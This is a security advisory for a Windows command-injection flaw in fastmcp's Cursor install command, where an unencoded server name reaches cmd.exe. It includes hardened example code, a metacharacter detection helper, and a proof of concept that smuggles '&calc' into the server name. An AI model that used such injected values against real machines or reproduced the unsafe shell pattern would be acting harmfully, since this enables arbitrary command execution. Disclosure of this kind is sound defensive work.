PT-2025-45769 · Pypi · Fastmcp
Published 2025-10-29 · Updated 2025-10-29
CVSS v4.0 5.4 Medium
| Vector | AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
Summary
A command-injection vulnerability lets any attacker who can influence the server name field of an MCP server execute arbitrary OS commands on Windows hosts that run fastmcp install cursor.
Details
- generate_cursor_deeplink(server_name, …) embeds server_name verbatim in a cursor://…?name= query string.
- open_deeplink() is invoked with shell=True only on Windows, which runs the deeplink through cmd.exe /c start.
- Any cmd metacharacter inside server_name (&, |, >, ^, …) terminates the start command and spawns an attacker-chosen process.
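The flawed pattern beside its hardened counterpart, as an added illustration that is not fastmcp's own code: the deeplink path is a placeholder and the function names are assumptions. It shows that percent-encoding the query value turns `&` into `%26`, that the receiving side still reads the name back intact, and that handing the URL to the OS without a shell (os.startfile on Windows, an argv list elsewhere) leaves cmd.exe no metacharacters to parse.

```python
import os
import subprocess
import sys
from urllib.parse import parse_qs, urlencode, urlparse

# Placeholder for the Cursor deeplink path the advisory elides; not the real one.
DEEPLINK_BASE = "cursor://PLACEHOLDER-DEEPLINK-PATH"

# Metacharacters cmd.exe interprets when a string reaches it via shell=True.
CMD_METACHARS = set("&|<>^")


def cmd_metachars_in(text: str) -> set[str]:
    """Detection helper: which cmd.exe metacharacters survive in the string."""
    return {c for c in text if c in CMD_METACHARS}


def build_deeplink_unsafe(server_name: str) -> str:
    """The flawed pattern: the name is dropped into the query string verbatim."""
    return f"{DEEPLINK_BASE}?name={server_name}"


def build_deeplink(server_name: str) -> str:
    """Hardened: percent-encode every query value, so '&' becomes '%26'."""
    return f"{DEEPLINK_BASE}?{urlencode({'name': server_name})}"


def server_name_from_deeplink(url: str) -> str:
    """What the receiving application reads back as the server name."""
    return parse_qs(urlparse(url).query).get("name", [""])[0]


def open_deeplink(url: str, platform: str = sys.platform, dry_run: bool = False):
    """Hand the URL to the OS without any shell. Returns the argv used, or None
    on Windows, where os.startfile (a direct ShellExecute call, no cmd.exe)
    receives the URL as one opaque string."""
    if platform == "win32":
        if not dry_run:
            os.startfile(url)
        return None
    argv = ["xdg-open" if platform.startswith("linux") else "open", url]
    if not dry_run:
        subprocess.run(argv, check=False)  # list argv, no shell: url is one argument
    return argv
```

With the unsafe builder the parsed name is truncated at the `&` (exactly where cmd.exe would start a second command); with the hardened builder it round-trips as `test&calc`.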
PoC
server.py

```python
import random
from fastmcp import FastMCP

# The server name is the attacker-controlled field; "&calc" is what cmd.exe sees after "test".
mcp = FastMCP(name="test&calc")


@mcp.tool
def roll_dice(n_dice: int) -> list[int]:
    """Roll `n_dice` 6-sided dice and return the results."""
    return [random.randint(1, 6) for _ in range(n_dice)]


if __name__ == "__main__":
    mcp.run()
```

then run in the terminal:

```
fastmcp install cursor server.py
```

Impact
OS Command / Shell Injection (CWE-78)
Every Windows host that runs fastmcp install cursor is at risk: developers' local workstations, CI/CD agents and corporate build machines alike.
Fix
OS Command Injection
Weakness Enumeration
Related Identifiers
Affected Products
Fastmcp